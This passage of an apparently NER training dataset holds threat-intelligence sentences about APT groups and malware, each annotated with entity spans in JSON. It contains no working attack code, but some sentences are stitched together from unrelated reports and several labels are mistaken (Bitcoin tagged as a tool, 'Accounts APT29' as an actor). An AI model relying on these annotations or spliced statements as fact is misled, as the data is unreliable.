up infected applications or rebooting their phones , it silently uploads their entire contacts list to Hangzhou Shun Wang Technologies controlled servers . 
By compromising a user account that has administrative or elevated access , Magic Hound can quickly access a targeted environment to achieve their objectives .", "spans": {"SYSTEM: ProGuard": [[0, 8]], "SYSTEM: Android": [[40, 47]], "MALWARE: EventBot": [[63, 71]], "MALWARE: SWAnalytics": [[133, 144]]}, "info": {"id": "cyberner_stix_train_004826", "source": "cyberner_stix_train"}} {"text": "It is worth noting that if the source file location contains the string “ System Volume Information\\S-1-5-21-1315235578-283289242\\ ” , then the file is deleted after copying to the “ stash ” directory .", "spans": {}, "info": {"id": "cyberner_stix_train_004827", "source": "cyberner_stix_train"}} {"text": "Along with the executable , two binary files , inject.bin (malicious function code) and imain.bin (malicious control logic) , were deployed as the controller’s payload . WannaCry appends encrypted data files with the .WCRY extension , drops and executes a decryptor tool , and demands $300 or $600 USD ( via Bitcoin ) to decrypt the data .", "spans": {"MALWARE: binary files": [[32, 44]], "MALWARE: imain.bin": [[88, 97]], "MALWARE: WannaCry": [[170, 178]], "FILEPATH: .WCRY": [[217, 222]], "TOOL: Bitcoin": [[308, 315]]}, "info": {"id": "cyberner_stix_train_004828", "source": "cyberner_stix_train"}} {"text": "update.exe module and Keylogger by ‘ El3ct71k ’ code comparison Xenotix Python Keylogger including specified mutex ‘ mutex_var_xboz ’ . To make this data harvesting operation flexible , SWAnalytics equips the ability to receive and process configuration files from a remote Command-and-Control . 
admin@338 is a China based cyber threat group .", "spans": {"SYSTEM: Xenotix Python Keylogger": [[64, 88]], "MALWARE: SWAnalytics": [[186, 197]], "THREAT_ACTOR: admin@338": [[296, 305]]}, "info": {"id": "cyberner_stix_train_004829", "source": "cyberner_stix_train"}} {"text": "This naming decision was founded upon the underlying methodology described in the Diamond Model of intrusion analysis .", "spans": {}, "info": {"id": "cyberner_stix_train_004830", "source": "cyberner_stix_train"}} {"text": "The SMS message with a link to a banker looked as follows : “ % USERNAME % , i send you prepayment gumtree [ . In the same year , Silence conducted DDoS attacks using the Perl IRC bot and public IRC chats to control Trojans . Based on the compilation date of the two binaries , this campaign took place in September 2014 .", "spans": {"THREAT_ACTOR: Silence": [[130, 137]], "TOOL: Perl IRC bot": [[171, 183]], "TOOL: public IRC": [[188, 198]]}, "info": {"id": "cyberner_stix_train_004831", "source": "cyberner_stix_train"}} {"text": "The “ core ” module contacts the C & C server , trying to get a fresh list of applications to search for , or if that fails , use a default app list : whatsapp lenovo.anyshare.gps mxtech.videoplayer.ad jio.jioplay.tv jio.media.jiobeats jiochat.jiochatapp jio.join good.gamecollection opera.mini.native startv.hotstar meitu.beautyplusme domobile.applock touchtype.swiftkey flipkart.android cn.xender It is worth noting that attackers used the same compromised websites to spread Buhtrap as those that had been used for the Corkow Trojan . In later stages , Dexphot targets a few other system processes for process hollowing : svchost.exe , tracert.exe , and setup.exe . 
Enterprise T1078 Valid Accounts APT29 has used a compromised account to access an organization 's VPN infrastructure .", "spans": {"SYSTEM: whatsapp": [[151, 159]], "TOOL: compromised websites": [[447, 467]], "TOOL: Buhtrap": [[478, 485]], "TOOL: Corkow Trojan": [[522, 535]], "MALWARE: Dexphot": [[556, 563]], "FILEPATH: svchost.exe": [[625, 636]], "FILEPATH: tracert.exe": [[639, 650]], "FILEPATH: setup.exe": [[657, 666]], "THREAT_ACTOR: Accounts APT29": [[692, 706]], "SYSTEM: organization 's VPN infrastructure": [[751, 785]]}, "info": {"id": "cyberner_stix_train_004832", "source": "cyberner_stix_train"}} {"text": "It appears the attackers sent malicious executables though phishing campaigns impersonating individuals associated with the Palestinian Security Services , the General Directorate of Civil Defence - Ministry of the Interior , and the 7th Fateh Conference of the Palestinian National Liberation Front ( held in late 2016 ) . In addition to these , we also identified \" Macfog \" , a native Mac OS X implementation of Icefog that infected several hundred victims worldwide . They likely generate the encoded commands on their own systems before pasting them in to an HTML file hosted by the hop point . 
• Bad actors who want to get into the cyber attack business need little to no technical skills to get started .", "spans": {"ORGANIZATION: Palestinian Security Services": [[124, 153]], "ORGANIZATION: General Directorate of Civil Defence": [[160, 196]], "ORGANIZATION: Ministry of the Interior": [[199, 223]], "ORGANIZATION: Palestinian National Liberation Front": [[262, 299]], "TOOL: Macfog": [[368, 374]], "TOOL: native Mac OS X implementation": [[381, 411]], "TOOL: Icefog": [[415, 421]], "TOOL: HTML": [[564, 568]], "THREAT_ACTOR: Bad actors": [[602, 612]]}, "info": {"id": "cyberner_stix_train_004833", "source": "cyberner_stix_train"}} {"text": "We can respond to those commands by instead sending two files of our choice to the Quasar serve .", "spans": {"MALWARE: Quasar": [[83, 89]]}, "info": {"id": "cyberner_stix_train_004834", "source": "cyberner_stix_train"}} {"text": "] com ) that prompts the user to install a malicious iOS configuration profile to solve a network issue preventing the site to load . APT1 is a China-based cyber-espionage group , active since mid-2006 . In text mode, Glimpse manually builds a DNS query to be transmitted over a UDP socket . 
The CozyDuke malware utilizes a backdoor and dropper , and exfiltrates data to a C2 server .", "spans": {"SYSTEM: iOS": [[53, 56]], "THREAT_ACTOR: APT1": [[134, 138]], "THREAT_ACTOR: cyber-espionage group": [[156, 177]], "MALWARE: Glimpse": [[218, 225]], "TOOL: UDP socket": [[279, 289]], "MALWARE: CozyDuke": [[296, 304]], "SYSTEM: C2 server": [[373, 382]]}, "info": {"id": "cyberner_stix_train_004835", "source": "cyberner_stix_train"}} {"text": "We examine their use malware such as Jaff , Bart , and Rockloader that appear to be exclusive to this group as well as more widely distributed malware like Dridex and Pony .", "spans": {"MALWARE: Jaff": [[37, 41]], "MALWARE: Bart": [[44, 48]], "MALWARE: Rockloader": [[55, 65]], "MALWARE: Dridex": [[156, 162]], "MALWARE: Pony": [[167, 171]]}, "info": {"id": "cyberner_stix_train_004836", "source": "cyberner_stix_train"}} {"text": "Accessibility Service is long known to be the Achilles ’ heel of the Android operating system . On July 9 , we discovered a new version of SLUB delivered via another unique watering hole website . The IndiaBravo-PapaAlfa installer is responsible for installing the service DLL variant .", "spans": {"SYSTEM: Android": [[69, 76]], "ORGANIZATION: we": [[108, 110]], "THREAT_ACTOR: SLUB": [[139, 143]], "MALWARE: IndiaBravo-PapaAlfa installer": [[201, 230]], "TOOL: DLL": [[273, 276]]}, "info": {"id": "cyberner_stix_train_004837", "source": "cyberner_stix_train"}} {"text": "Scarlet Mimic primarily deploys spear-phishing e-mails to infect its targets , but was also responsible for a watering hole attack in 2013 . 
The May 2014 ' Operation Saffron Rose ' publication identifies an Iranian hacking group formerly named ' Ajax Security ' ( code-named ' Flying Kitten ' by CrowdStrike ) engaged in active spear phishing attacks on Iranian dissidents ( those attempting to circumvent government traffic monitoring ) .", "spans": {"THREAT_ACTOR: Scarlet Mimic": [[0, 13]], "THREAT_ACTOR: Ajax Security": [[246, 259]], "THREAT_ACTOR: Flying Kitten": [[277, 290]], "ORGANIZATION: CrowdStrike": [[296, 307]], "ORGANIZATION: dissidents": [[362, 372]]}, "info": {"id": "cyberner_stix_train_004838", "source": "cyberner_stix_train"}} {"text": "The domain name , language of the site and app content hosted suggest this site is a third-party app store for whom the intended users are the Uyghurs . Despite the added capabilities , we still agree with Kaspersky that this backdoor is likely used as an initial reconnaissance tool and would probably be used as a staging point to deploy one of Turla’s more fully featured implants . 
These data sets show that APT1 is either operating in China during normal Chinese business hours or that APT1 is intentionally going to painstaking lengths to look like they are .", "spans": {"ORGANIZATION: Kaspersky": [[206, 215]], "THREAT_ACTOR: Turla’s": [[347, 354]], "THREAT_ACTOR: APT1": [[412, 416], [491, 495]]}, "info": {"id": "cyberner_stix_train_004839", "source": "cyberner_stix_train"}} {"text": "Back in April 2019 , we first observed the Emissary Panda threat group exploiting CVE-2019-0604 to install webshells on SharePoint servers at government organizations in two Middle Eastern countries .", "spans": {"THREAT_ACTOR: Emissary Panda": [[43, 57]], "VULNERABILITY: CVE-2019-0604": [[82, 95]], "TOOL: SharePoint": [[120, 130]]}, "info": {"id": "cyberner_stix_train_004840", "source": "cyberner_stix_train"}} {"text": "It is behind a large number of cyberattacks targeting global aerospace and defense contractors , military units , political parties , the International Olympic Committee ( IOC ) , anti-doping agencies , government departments and various other verticals .", "spans": {"ORGANIZATION: International Olympic Committee": [[138, 169]], "ORGANIZATION: IOC": [[172, 175]]}, "info": {"id": "cyberner_stix_train_004842", "source": "cyberner_stix_train"}} {"text": "Upon execution , it will communicate with an attacker-controller website to download a variant of the Pony malware , pm.dll” along with a standard Vawtrak trojan . 
The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques .", "spans": {"MALWARE: Pony malware": [[102, 114]], "MALWARE: Barlaiy": [[230, 237]], "MALWARE: PlugXL": [[246, 252]], "THREAT_ACTOR: Barium": [[275, 281]]}, "info": {"id": "cyberner_stix_train_004843", "source": "cyberner_stix_train"}} {"text": "The initial Flash object must contact the same C2 server to download a secondary payload ;", "spans": {"TOOL: Flash": [[12, 17]], "TOOL: C2": [[47, 49]]}, "info": {"id": "cyberner_stix_train_004844", "source": "cyberner_stix_train"}} {"text": "Some recent campaigns against other bank customers also used “ .gdn ” TLDs . The threat actors behind the Sea Turtle campaign were successful in compromising entities by manipulating and falsifying DNS records at various levels in the domain name space . Patchwork has been seen targeting industries related to diplomatic and government agencies .", "spans": {"THREAT_ACTOR: threat actors": [[81, 94]], "THREAT_ACTOR: Patchwork": [[255, 264]], "ORGANIZATION: diplomatic": [[311, 321]], "ORGANIZATION: government agencies": [[326, 345]]}, "info": {"id": "cyberner_stix_train_004845", "source": "cyberner_stix_train"}} {"text": "When installed on a device , apps containing adware may , among other things : Annoy users with intrusive advertisements , including scam ads Waste the device ’ s battery resources Generate increased network traffic Gather users ’ personal information Hide their presence on the affected device to achieve persistence Generate revenue for their operator without any user interaction Conclusion Based solely on open source intelligence , we were able to trace the developer of the Ashas adware and establish his identity and discover additional related adware-infected apps . 
Ordnance will be able to immediately generate shellcode after users provide the IP and Port that the shellcode should connect to or listen on . We have found what may be an early data-gathering stage for future possible heists from financial organizations in Turkey ( and possibly other countries ) .", "spans": {"MALWARE: Ashas": [[480, 485]], "MALWARE: Ordnance": [[575, 583]], "MALWARE: shellcode": [[676, 685]], "ORGANIZATION: financial organizations": [[807, 830]]}, "info": {"id": "cyberner_stix_train_004846", "source": "cyberner_stix_train"}} {"text": "Once this malware has successfully installed , it will collect personal data , passwords , keystrokes , banking information , and more . Additional capabilities of the More_eggs malware include the download and execution of files and scripts and running commands using cmd.exe . Just recently , PIVY was the payload of a zero-day exploit in Internet Explorer used in what is known as a \" strategic web compromise \" attack against visitors to a U.S. government website and a variety of others .", "spans": {"MALWARE: More_eggs malware": [[168, 185]], "MALWARE: cmd.exe": [[269, 276]], "MALWARE: PIVY": [[295, 299]], "VULNERABILITY: zero-day": [[321, 329]], "VULNERABILITY: exploit": [[330, 337]]}, "info": {"id": "cyberner_stix_train_004847", "source": "cyberner_stix_train"}} {"text": "Research presented in this report shows that the PUTTER PANDA operators are likely members of the 12th Bureau , 3rd General Staff Department ( GSD ) of the People 's Liberation Army ( PLA ) , operating from the unit 's headquarters in Shanghai with MUCD 61486 . 
Desert Falcons is keenly aware of the information they can derive from these devices and are using multi-stage ( phishing + an executable ) , multi-platform ( Android + desktop ) attacks to accomplish their spying .", "spans": {"THREAT_ACTOR: PUTTER PANDA": [[49, 61]], "THREAT_ACTOR: operators": [[62, 71]], "ORGANIZATION: People 's Liberation Army": [[156, 181]], "ORGANIZATION: PLA": [[184, 187]], "THREAT_ACTOR: MUCD 61486": [[249, 259]], "THREAT_ACTOR: Desert Falcons": [[262, 276]], "SYSTEM: Android": [[421, 428]]}, "info": {"id": "cyberner_stix_train_004848", "source": "cyberner_stix_train"}} {"text": "Since at least 2014 , FireEye has observed APT32 targeting foreign corporations with a vested interest in Vietnama's manufacturing , consumer products , and hospitality sectors . Examples as early as 2008 document malware operations against Tibetan non-governmental organizations ( NGOs ) that also targeted Falun Gong and Uyghur groups .", "spans": {"ORGANIZATION: FireEye": [[22, 29]], "THREAT_ACTOR: APT32": [[43, 48]], "ORGANIZATION: manufacturing": [[117, 130]], "ORGANIZATION: consumer products": [[133, 150]], "ORGANIZATION: hospitality sectors": [[157, 176]], "FILEPATH: document malware": [[205, 221]], "ORGANIZATION: Tibetan non-governmental organizations": [[241, 279]], "ORGANIZATION: NGOs": [[282, 286]], "ORGANIZATION: Falun Gong": [[308, 318]], "ORGANIZATION: Uyghur groups": [[323, 336]]}, "info": {"id": "cyberner_stix_train_004849", "source": "cyberner_stix_train"}} {"text": "Package names for infected apps typically contain a common naming structure that includes com.XXXXXXXXX.camera , for example com.bird.sky.whale.camera ( app name : Whale Camera ) , com.color.rainbow.camera ( Rainbow Camera ) , and com.fishing.when.orangecamera ( Orange Camera ) . The Lazarus Group employs a variety of RATs and staging malware to conduct cyber operations , many of which contain significant code overlap that points to at least a shared development environment . 
It may also download additional potentially malicious files . The command and control ( C2 ) server must be configured from either the command line or a configuration file .", "spans": {"SYSTEM: Whale Camera": [[164, 176]], "SYSTEM: Rainbow Camera": [[208, 222]], "SYSTEM: Orange Camera": [[263, 276]], "THREAT_ACTOR: Lazarus Group": [[285, 298]], "TOOL: RATs": [[320, 324]], "TOOL: staging malware": [[329, 344]]}, "info": {"id": "cyberner_stix_train_004850", "source": "cyberner_stix_train"}} {"text": "The GCMAN group used an MS SQL injection in commercial software running on one of bank 's public web services , and about a year and a half later , they came back to cash out . In order to understand SWAnalytics’ impact , we turned to public download volume data available on Chandashi , one of the app store optimization vendors specialized in Chinese mobile application markets .", "spans": {"THREAT_ACTOR: GCMAN group": [[4, 15]], "ORGANIZATION: bank": [[82, 86]], "FILEPATH: SWAnalytics’": [[200, 212]]}, "info": {"id": "cyberner_stix_train_004851", "source": "cyberner_stix_train"}} {"text": "The architecture is quite similar to the one described previously , but the opcodes are slightly different . Since at least 2014 , an Iranian threat group tracked by FireEye as APT34 has conducted reconnaissance aligned with the strategic interests of Iran . To extract the payload , the malware will first initialize the GDI+ API and get the image width and height values . 
New variants based on leaked code are becoming more common We have continued seeing various malicious campaigns since the start of 2023 , where the threat actors have used new ransomware variants based on leaked source code or builders .", "spans": {"THREAT_ACTOR: threat group": [[142, 154]], "ORGANIZATION: FireEye": [[166, 173]], "THREAT_ACTOR: APT34": [[177, 182]]}, "info": {"id": "cyberner_stix_train_004852", "source": "cyberner_stix_train"}} {"text": "However , the group is content leaving some malware on the network , likely to provide a contingency if other access channels are removed .", "spans": {}, "info": {"id": "cyberner_stix_train_004853", "source": "cyberner_stix_train"}} {"text": "8f5d5d8419a4832d175a6028c9e7d445f1e99fdc12170db257df79831c69ae4e a5ebcdaf5fd10ec9de85d62e48cc97a4e08c699a7ebdeab0351b86ab1370557d 84578b9b2c3cc1c7bbfcf4038a6c76ae91dfc82eef5e4c6815627eaf6b4ae6f6 The oil and gas infrastructure nexus observed in connection with greensky27.vicp.net and other Unit 78020 ( Naikon ) infrastructure suggests targeting patterns supportive of the PRC 's strategic interests over energy resources within the South China Sea and Southeast Asia . Rancor : DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E . 
Then , it is called passing reused allocated memory and not a pointer to structure .", "spans": {"ORGANIZATION: oil and gas": [[199, 210]], "THREAT_ACTOR: Naikon": [[303, 309]], "ORGANIZATION: energy resources": [[405, 421]], "THREAT_ACTOR: Rancor": [[470, 476]], "FILEPATH: DB982B256843D8B6429AF24F766636BB0BF781B471922902D8DCF08D0C58511E": [[479, 543]]}, "info": {"id": "cyberner_stix_train_004854", "source": "cyberner_stix_train"}} {"text": "The attacks targeted high-profile targets , including government and commercial organizations .", "spans": {}, "info": {"id": "cyberner_stix_train_004855", "source": "cyberner_stix_train"}} {"text": "Related or not , one thing is certain : the actor ( s ) using these customized BlackEnergy malware are intent on stealing information from the targets . The targets were similar to a 2015 TG-4127 campaign — individuals in Russia and the former Soviet states , current and former military and government personnel in the U.S. and Europe , individuals working in the defense and government supply chain , and authors and journalists — but also included email accounts linked to the November 2016 United States presidential election .", "spans": {"THREAT_ACTOR: actor": [[44, 49]], "TOOL: BlackEnergy malware": [[79, 98]], "ORGANIZATION: military": [[279, 287]], "ORGANIZATION: government personnel": [[292, 312]], "ORGANIZATION: defense": [[365, 372]], "ORGANIZATION: government": [[377, 387]], "ORGANIZATION: authors": [[407, 414]], "ORGANIZATION: journalists": [[419, 430]]}, "info": {"id": "cyberner_stix_train_004856", "source": "cyberner_stix_train"}} {"text": "Cannon opens the email with the correct subject and decodes the hexadecimal data in the body of the message to obtain the file path that it will use to move the downloaded auddevc.txt file .", "spans": {"MALWARE: Cannon": [[0, 6]], "TOOL: email": [[17, 22]], "FILEPATH: auddevc.txt": [[172, 183]]}, "info": {"id": "cyberner_stix_train_004857", "source": "cyberner_stix_train"}} {"text": 
"Anomali Researchers were able to identify multiple samples of malicious RTF documents ITW using the same exploit for CVE-2018-0798 . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) .", "spans": {"ORGANIZATION: Anomali": [[0, 7]], "MALWARE: ITW": [[86, 89]], "VULNERABILITY: CVE-2018-0798": [[117, 130]], "MALWARE: Khuai": [[297, 302]]}, "info": {"id": "cyberner_stix_train_004858", "source": "cyberner_stix_train"}} {"text": "How Judy operates : To bypass Bouncer , Google Play ’ s protection , the hackers create a seemingly benign bridgehead app , meant to establish connection to the victim ’ s device , and insert it into the app store . In this campaign , the attackers experimented with publicly available tooling for attack operations . If the list does not contain any item , or if the verification has failed , the ZxShell sample tries to connect to a hardcoded host Budworm is a longrunning APT group that is believed to have been active since at least 2013 .", "spans": {"MALWARE: Judy": [[4, 8]], "SYSTEM: Bouncer": [[30, 37]], "SYSTEM: Google Play": [[40, 51]], "TOOL: publicly available tooling": [[267, 293]], "MALWARE: ZxShell": [[398, 405]], "THREAT_ACTOR: Budworm": [[450, 457]], "THREAT_ACTOR: APT group": [[475, 484]]}, "info": {"id": "cyberner_stix_train_004859", "source": "cyberner_stix_train"}} {"text": "The most recent series of attacks observed was in December 2016 .", "spans": {}, "info": {"id": "cyberner_stix_train_004860", "source": "cyberner_stix_train"}} {"text": "Dragos does not publicly describe ICS activity group technical details except in extraordinary circumstances in order to limit tradecraft proliferation .", "spans": {"ORGANIZATION: Dragos": [[0, 6]], "TOOL: ICS": [[34, 37]]}, "info": {"id": "cyberner_stix_train_004861", "source": "cyberner_stix_train"}} {"text": "SecureWorks Counter Threat Unit ( CTU ) 
researchers track the activities of Threat Group-4127 , which targets governments , military , and international non-governmental organizations ( NGOs ) .", "spans": {"ORGANIZATION: SecureWorks Counter Threat Unit": [[0, 31]], "ORGANIZATION: CTU": [[34, 37]], "ORGANIZATION: Threat Group-4127": [[76, 93]]}, "info": {"id": "cyberner_stix_train_004862", "source": "cyberner_stix_train"}} {"text": "Code snippet showing GolfSpy generating UUID The value of % is in the range of 1-9 or a-j . This malware uses the public privilege escalation exploit code CVE-2018-8120 or UACME which is normally used by legitimate red teams . The first module downloaded by the GRIFFON malware to the victim’s computer is an information-gathering JScript , which allows the cybercriminals to understand the context of the infected workstation . But other bad actors have since adopted this businesses model , offering every from command and control servers to phishing bots - as - a - service .", "spans": {"MALWARE: GolfSpy": [[21, 28]], "VULNERABILITY: CVE-2018-8120": [[155, 168]], "TOOL: UACME": [[172, 177]], "MALWARE: GRIFFON": [[262, 269]], "TOOL: JScript": [[331, 338]], "THREAT_ACTOR: bad actors": [[439, 449]], "SYSTEM: command and control servers": [[513, 540]], "THREAT_ACTOR: phishing bots - as - a - service": [[544, 576]]}, "info": {"id": "cyberner_stix_train_004863", "source": "cyberner_stix_train"}} {"text": "We will refer to this IP address as Command & Control ( or C&C ) .", "spans": {"TOOL: Command & Control": [[36, 53]], "TOOL: C&C": [[59, 62]]}, "info": {"id": "cyberner_stix_train_004864", "source": "cyberner_stix_train"}} {"text": "The backdoor was delivered via a malicious .rtf file that exploited CVE-2017-0199 . 
The diagram below illustrates how we believe the actors behind the Sea Turtle campaign used DNS hijacking to achieve their end goals .", "spans": {"MALWARE: .rtf file": [[43, 52]], "VULNERABILITY: CVE-2017-0199": [[68, 81]], "FILEPATH: Sea Turtle": [[151, 161]]}, "info": {"id": "cyberner_stix_train_004865", "source": "cyberner_stix_train"}} {"text": "The Trojan displays the extortion page ( extortionist.html ) that blocks the device and demands a ransom for unblocking it . According to Deepen , APT6 has been using spear phishing in tandem with malicious PDF and ZIP attachments or links to malware infected websites that contains a malicious SCR file . RASPITE overlaps significantly with Symantec 's Leafminer , which recently released a report on the group 's activity in the Middle East .", "spans": {"ORGANIZATION: Deepen": [[138, 144]], "THREAT_ACTOR: APT6": [[147, 151]], "TOOL: PDF": [[207, 210]], "TOOL: ZIP": [[215, 218]], "MALWARE: SCR file": [[295, 303]], "THREAT_ACTOR: RASPITE": [[306, 313]], "ORGANIZATION: Symantec": [[342, 350]], "THREAT_ACTOR: Leafminer": [[354, 363]]}, "info": {"id": "cyberner_stix_train_004866", "source": "cyberner_stix_train"}} {"text": "Numerous targeted attack campaigns are occurring every week .", "spans": {}, "info": {"id": "cyberner_stix_train_004867", "source": "cyberner_stix_train"}} {"text": "This ransomware family is known for being hosted on arbitrary websites and circulated on online forums using various social engineering lures , including masquerading as popular apps , cracked games , or video players . Similar to that of their targeted attacks , Gorgon Group leveraged Bitly for distribution and shortening of C2 domains . 
The failure examples are : From what we ’ve seen in Hack520 ’s blog , as well as the infrastructure deployed around it , it is quite safe to say that Hack520 is involved in aspects of the VPS service activity provided to groups like Winnti and other cybercriminals or threat actors .", "spans": {"THREAT_ACTOR: Gorgon Group": [[264, 276]], "TOOL: Bitly": [[287, 292]], "SYSTEM: VPS service": [[529, 540]], "THREAT_ACTOR: Winnti": [[574, 580]], "THREAT_ACTOR: threat actors": [[609, 622]]}, "info": {"id": "cyberner_stix_train_004868", "source": "cyberner_stix_train"}} {"text": "The group 's spearphish toolset includes PDF exploits , Adobe Flash Player exploits , and the common CVE-2012-0158 Word exploits including those generated from the infamous \" Tran Duy Linh \" kit . It mainly targets Microsoft Outlook , a widely used mail client , but also targets The Bat! , a mail client very popular in Eastern Europe .", "spans": {"THREAT_ACTOR: group": [[4, 9]], "VULNERABILITY: PDF exploits": [[41, 53]], "VULNERABILITY: Adobe Flash Player exploits": [[56, 83]], "VULNERABILITY: CVE-2012-0158": [[101, 114]], "VULNERABILITY: Word exploits": [[115, 128]], "TOOL: Tran Duy Linh": [[175, 188]], "ORGANIZATION: Microsoft": [[215, 224]], "TOOL: Outlook": [[225, 232]]}, "info": {"id": "cyberner_stix_train_004869", "source": "cyberner_stix_train"}} {"text": "It comes as no surprise then that many SMS-Trojans include bot functionality . Thrip was attempting to remotely install a previously unknown piece of malware ( Infostealer.Catchamas ) on computers within the victim 's network . One might also note that the number of modules embedded in this variant is much higher ( 17 ) than the number of modules embedded in the variants previously documented in our white paper ( 8 to 10 modules ) . 
Ransomware attacks have shown no signs of slowing down in 2023 .", "spans": {"MALWARE: Infostealer.Catchamas": [[160, 181]], "THREAT_ACTOR: Ransomware attacks": [[437, 455]]}, "info": {"id": "cyberner_stix_train_004870", "source": "cyberner_stix_train"}} {"text": "Examples of the overlays available to the malware Above , you can see examples of the injections that distributed to the malware as part of this specific campaign . In line with commonly used APT actor methodologies , the threat actor aligns its decoy documents to a topic of interest relevant to the recipient . While the investigation is still in progress and full results and technical paper will be published during SAS 2019 conference in Singapore , we would like to share some important details about the attack . In several cases , the threat actor used 7 - zip to create an encrypted segmented archive to compress the reconnaissance results .", "spans": {"THREAT_ACTOR: APT actor": [[192, 201]], "THREAT_ACTOR: threat actor": [[222, 234]], "TOOL: decoy documents": [[246, 261]], "TOOL: 7 - zip": [[561, 568]]}, "info": {"id": "cyberner_stix_train_004871", "source": "cyberner_stix_train"}} {"text": "The initial beacon to index.php changed to index.txt but ZeroT still expects an RC4 encrypted response using a static key : “ (*^GF (9042&* ” .", "spans": {"FILEPATH: index.php": [[22, 31]], "FILEPATH: index.txt": [[43, 52]], "MALWARE: ZeroT": [[57, 62]]}, "info": {"id": "cyberner_stix_train_004872", "source": "cyberner_stix_train"}} {"text": "One possibility is that PLATINUM might have obtained compromised credentials from victim networks . 
The attackers first researched desired targets and then sent an email specifically to the target .", "spans": {"THREAT_ACTOR: PLATINUM": [[24, 32]]}, "info": {"id": "cyberner_stix_train_004873", "source": "cyberner_stix_train"}} {"text": "Figure 1 : ‘ Agent Smith ’ s modular structure Technical Analysis – Loader Module The “ loader ” module , as stated above , extracts and runs the “ core ” module . Buhtrap has been active since 2014 , however their first attacks against financial institutions were only detected in August 2015 . 4 、A loader DLL , which is extracted from the archive ; APT29 also created a scheduled task to maintain SUNSPOT persistence when the host booted .", "spans": {"MALWARE: Agent Smith": [[13, 24]], "THREAT_ACTOR: Buhtrap": [[164, 171]], "ORGANIZATION: financial institutions": [[237, 259]], "TOOL: DLL": [[308, 311]], "THREAT_ACTOR: APT29": [[352, 357]]}, "info": {"id": "cyberner_stix_train_004874", "source": "cyberner_stix_train"}} {"text": "In addition to that , API function names are reversed , presumably to avoid detection in memory .", "spans": {}, "info": {"id": "cyberner_stix_train_004875", "source": "cyberner_stix_train"}} {"text": "Originally targeting Western European banks , Emotet has since been developed into a robust global botnet that is comprised of several modules , each of which equips Emotet with different spamming , email logging , information stealing , bank fraud , downloading , and DDoS , among others . 
We also started monitoring the malware and , using Kaspersky Attribution Engine based on similarity algorithms , discovered that Octopus is related to DustSquad , something we reported in April 2018 .", "spans": {"ORGANIZATION: banks": [[38, 43]], "TOOL: Emotet": [[46, 52], [166, 172]], "ORGANIZATION: Kaspersky": [[342, 351]], "MALWARE: Octopus": [[420, 427]]}, "info": {"id": "cyberner_stix_train_004876", "source": "cyberner_stix_train"}} {"text": "However , using valid code-signing certificates stolen from organizations with a positive reputation can allow attackers to piggyback on that company ’s trust , making it easier to slip by these defenses and gain access to targeted computers .", "spans": {}, "info": {"id": "cyberner_stix_train_004877", "source": "cyberner_stix_train"}} {"text": "Audit ISAPI filters and search for web shells on Microsoft Exchange servers .", "spans": {"TOOL: ISAPI": [[6, 11]], "ORGANIZATION: Microsoft": [[49, 58]], "TOOL: Exchange": [[59, 67]]}, "info": {"id": "cyberner_stix_train_004878", "source": "cyberner_stix_train"}} {"text": "Additionally the author did some small updates after publications from the security community , again this is common for actors of this sophisticated nature , once their campaigns have been exposed they will often try to change tooling to ensure better avoidance .", "spans": {}, "info": {"id": "cyberner_stix_train_004879", "source": "cyberner_stix_train"}} {"text": "The use of HLS coincides with the use of ActionScript code from the f4player to make the traffic seem legitimate .", "spans": {"TOOL: HLS": [[11, 14]], "TOOL: ActionScript": [[41, 53]], "TOOL: f4player": [[68, 76]]}, "info": {"id": "cyberner_stix_train_004880", "source": "cyberner_stix_train"}} {"text": "These malware families have a rich history of being used in many targeted attacks against government and private organizations . 
Symantec has found evidence of Starloader files being named AdobeUpdate.exe , AcrobatUpdate.exe , and INTELUPDATE.EXE among others .", "spans": {"MALWARE: malware": [[6, 13]], "ORGANIZATION: government": [[90, 100]], "ORGANIZATION: private": [[105, 112]], "ORGANIZATION: organizations": [[113, 126]], "ORGANIZATION: Symantec": [[129, 137]], "FILEPATH: Starloader files": [[160, 176]], "FILEPATH: AdobeUpdate.exe": [[189, 204]], "FILEPATH: AcrobatUpdate.exe": [[207, 224]], "FILEPATH: INTELUPDATE.EXE": [[231, 246]]}, "info": {"id": "cyberner_stix_train_004881", "source": "cyberner_stix_train"}} {"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . These include remote desktop , webcam spying , remote shell , and file management . By the end of 2022 , Cuba ransomware threat actors had compromised over 100 organizations worldwide .", "spans": {"MALWARE: MXI Player": [[120, 130]], "THREAT_ACTOR: Cuba ransomware threat actors": [[387, 416]]}, "info": {"id": "cyberner_stix_train_004882", "source": "cyberner_stix_train"}} {"text": "For the following reasons , CTU researchers assess with moderate confidence that TG-3390 has a Chinese nexus :", "spans": {"ORGANIZATION: CTU": [[28, 31]], "THREAT_ACTOR: TG-3390": [[81, 88]]}, "info": {"id": "cyberner_stix_train_004883", "source": "cyberner_stix_train"}} {"text": "Users do n't have to install any additional security services to keep their devices safe . Leafminer is a highly active group , responsible for targeting a range of organizations across the Middle East . Although the malware uses different configurations in each case , the three affected software products included the same backdoor code and were launched using the same mechanism . 
The malware will then create the file RECOVERFILES.txt in each scanned folder .", "spans": {"THREAT_ACTOR: Leafminer": [[91, 100]], "THREAT_ACTOR: group": [[120, 125]], "MALWARE: malware": [[388, 395]]}, "info": {"id": "cyberner_stix_train_004884", "source": "cyberner_stix_train"}} {"text": "This particular threat was also used by hackers to compromise a Korean social network site to steal records of 35 million users . BRONZE UNION threat campaigns that illustrate the evolution of the group 's methods and espionage objectives .", "spans": {}, "info": {"id": "cyberner_stix_train_004885", "source": "cyberner_stix_train"}} {"text": "In addition to stealing keystrokes , Naikon also intercepted network traffic . CNIIHM 's characteristics are consistent with what we might expect of an organization responsible for TEMP.Veles activity .", "spans": {"THREAT_ACTOR: Naikon": [[37, 43]], "THREAT_ACTOR: CNIIHM": [[79, 85]], "THREAT_ACTOR: TEMP.Veles": [[181, 191]]}, "info": {"id": "cyberner_stix_train_004886", "source": "cyberner_stix_train"}} {"text": "As we noted in our previous research on the Apple threat landscape , some operating systems , such as Mac OS X , are configured by default to only allow applications to run if they have been signed with a valid certificate , meaning they are trusted .", "spans": {"ORGANIZATION: Apple": [[44, 49]], "SYSTEM: Mac OS X": [[102, 110]]}, "info": {"id": "cyberner_stix_train_004887", "source": "cyberner_stix_train"}} {"text": "MXI Player appears to be a version of the 